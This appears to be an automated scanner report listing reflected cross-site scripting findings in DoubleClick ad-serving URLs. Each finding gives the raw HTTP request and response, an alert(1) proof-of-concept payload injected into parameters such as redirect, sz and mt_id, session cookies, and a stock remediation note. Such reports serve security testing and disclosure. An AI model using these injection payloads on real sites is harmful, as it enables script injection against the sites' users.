HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6999 Date: Sat, 26 Mar 2011 01:38:37 GMT Vary: Accept-Encoding Expires: Sat, 26 Mar 2011 01:38:37 GMT Cache-Control: private, x-gzip-ok=""
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b95c6a'-alert(1)-'c3ace347376&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM\"> ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c9ed'-alert(1)-'60d03a3f198 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=3c9ed'-alert(1)-'60d03a3f198 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6999 Cache-Control: no-cache Pragma: no-cache Date: Sat, 26 Mar 2011 01:38:45 GMT Expires: Sat, 26 Mar 2011 01:38:45 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=3c9ed'-alert(1)-'60d03a3f198https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM\"> ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21ef8"-alert(1)-"92ebfe0424f was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=21ef8"-alert(1)-"92ebfe0424f HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6999 Cache-Control: no-cache Pragma: no-cache Date: Sat, 26 Mar 2011 01:38:41 GMT Expires: Sat, 26 Mar 2011 01:38:41 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=21ef8"-alert(1)-"92ebfe0424fhttps%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM"); var fscUrl = url ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bec3'-alert(1)-'b3534d6f54d was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=543937510663803792bec3'-alert(1)-'b3534d6f54d&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6999 Date: Sat, 26 Mar 2011 01:38:11 GMT Vary: Accept-Encoding Expires: Sat, 26 Mar 2011 01:38:11 GMT Cache-Control: private, x-gzip-ok=""
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... tp://ad.doubleclick.net/click%3Bh%3Dv8/3ad6/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=543937510663803792bec3'-alert(1)-'b3534d6f54d&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3D ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7ede"-alert(1)-"78d948007db was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379e7ede"-alert(1)-"78d948007db&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6999 Date: Sat, 26 Mar 2011 01:38:07 GMT Vary: Accept-Encoding Expires: Sat, 26 Mar 2011 01:38:07 GMT Cache-Control: private, x-gzip-ok=""
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... tp://ad.doubleclick.net/click%3Bh%3Dv8/3ad6/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379e7ede"-alert(1)-"78d948007db&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3D ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26d19'-alert(1)-'06d1516c0ac was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N553.mediamath/B5123370.43;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=7026d19'-alert(1)-'06d1516c0ac&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=60843514997508161? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 670 Date: Sat, 26 Mar 2011 01:37:49 GMT Vary: Accept-Encoding Expires: Sat, 26 Mar 2011 01:37:49 GMT Cache-Control: private, x-gzip-ok=""
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ac00'-alert(1)-'fb3b0cd2a48 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N553.mediamath/B5123370.43;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=1091329ac00'-alert(1)-'fb3b0cd2a48&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=60843514997508161? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 670 Date: Sat, 26 Mar 2011 01:37:45 GMT Vary: Accept-Encoding Expires: Sat, 26 Mar 2011 01:37:45 GMT Cache-Control: private, x-gzip-ok=""
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a78e'-alert(1)-'f8fecf152f0 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N553.mediamath/B5123370.43;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b8a78e'-alert(1)-'f8fecf152f0&redirect=;ord=60843514997508161? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 670 Date: Sat, 26 Mar 2011 01:37:53 GMT Vary: Accept-Encoding Expires: Sat, 26 Mar 2011 01:37:53 GMT Cache-Control: private, x-gzip-ok=""
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f615'-alert(1)-'c0e60859184 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N553.mediamath/B5123370.43;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=8f615'-alert(1)-'c0e60859184 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 670 Cache-Control: no-cache Pragma: no-cache Date: Sat, 26 Mar 2011 01:37:58 GMT Expires: Sat, 26 Mar 2011 01:37:58 GMT
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da786'-alert(1)-'98c2520a2a5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
